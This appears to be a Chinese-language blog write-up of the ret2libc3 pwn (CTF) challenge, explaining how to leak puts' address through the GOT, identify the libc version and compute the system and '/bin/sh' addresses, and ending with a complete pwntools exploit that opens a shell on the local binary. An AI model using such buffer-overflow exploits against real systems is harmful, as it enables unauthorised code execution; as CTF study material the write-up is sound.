时隔好久了,终于又记起来我在学pwn了......
image.png
日常check保护发现只开了NX,然后进ida里
image.png
发现没有我们要的system函数了。既然这里没有system函数,那我们就要找到对应的.so库获取库里面对应的system函数的地址和/bin/sh的地址。
第一步就是要通过知道libc中的一个函数地址,然后明确之间的地址偏移来确定libc。
image.png
所以我们就找程序调用过的函数,选puts吧。
我们可以通过ELF操作来获得plt表和got表上puts的地址,然后再回到程序最开始的地方准备执行接下来的操作。
image.png
我们发现_start函数是会调用到__libc_start_main函数的,而system和/bin/sh都在它里面,所以我们让第一步泄露了libc之后返回到_start函数。
然后爆个偏移
image.png
第一段泄露libc的代码如下
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_plt = elf.sybols['_start']#__libc_start_main
payload = flat(["a"*112+puts_plt+main_plt+puts_got])#最后得到的是got表里puts的真实地址
sh.sendlineafter('!?',payload)
puts_addr = u32(sh.recv()[0:4])#将得到的地址解包
print('puts_addr:'+hex(puts_addr))#数据转成十六进制输出
得到地址之后就可以通过手动搜索或者函数搜索出所用的libc。
obj = LibcSearcher('puts',puts_addr)
libc = puts_addr - obj.dump('puts')
system = obj.dump('system')+libc
binsh = obj.dump('str_bin_sh')+libc
payload1 = flat(["a"*112,system,'aaaa',binsh])
也可以按照上一part得到的地址后三位去找libc,这里的最后三位是ca0,去libc database那个网站找一下,结果如图(其实对比了两个,地址是一样的,但是不知道为什么会有两个)
image.png
用已知libc来写下半部分脚本,如下
libc=ELF("libc6_2.23-0ubuntu10_i386.so")
libc_puts=libc.symbols['puts']
libc_system=libc.symbols['system']
libc_binsh=next(libc.search("/bin/sh"))
#计算system,/bin/sh的实际加载地址
system_addr=puts_addr+(libc_system-libc_puts)
binsh_addr=puts_addr+(libc_binsh-libc_puts)
#第二次运行获取shell
payload=flat(["A"*112,system_addr,’aaaa’,binsh_addr])
我就选择用第一种写一个完整的exp吧
from pwn import *
from LibcSearcher import LibcSearcher
sh = process('./ret2libc3')
elf = ELF('./ret2libc3')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_plt = elf.symbols['_start']#__libc_start_main
payload = flat(["a"*112,puts_plt,main_plt,puts_got])
sh.sendlineafter('!?',payload)
puts_addr = u32(sh.recv()[0:4])
print("puts_addr:"+hex(puts_addr))
obj = LibcSearcher('puts',puts_addr)
libc = puts_addr - obj.dump('puts')
system = obj.dump('system')+libc
binsh = obj.dump('str_bin_sh')+libc
payload1 = flat(["a"*112,system,'aaaa',binsh])
sh.sendline(payload1)
sh.interactive()
然后运行一下,发现没有问题啦,就大功告成啦
image.png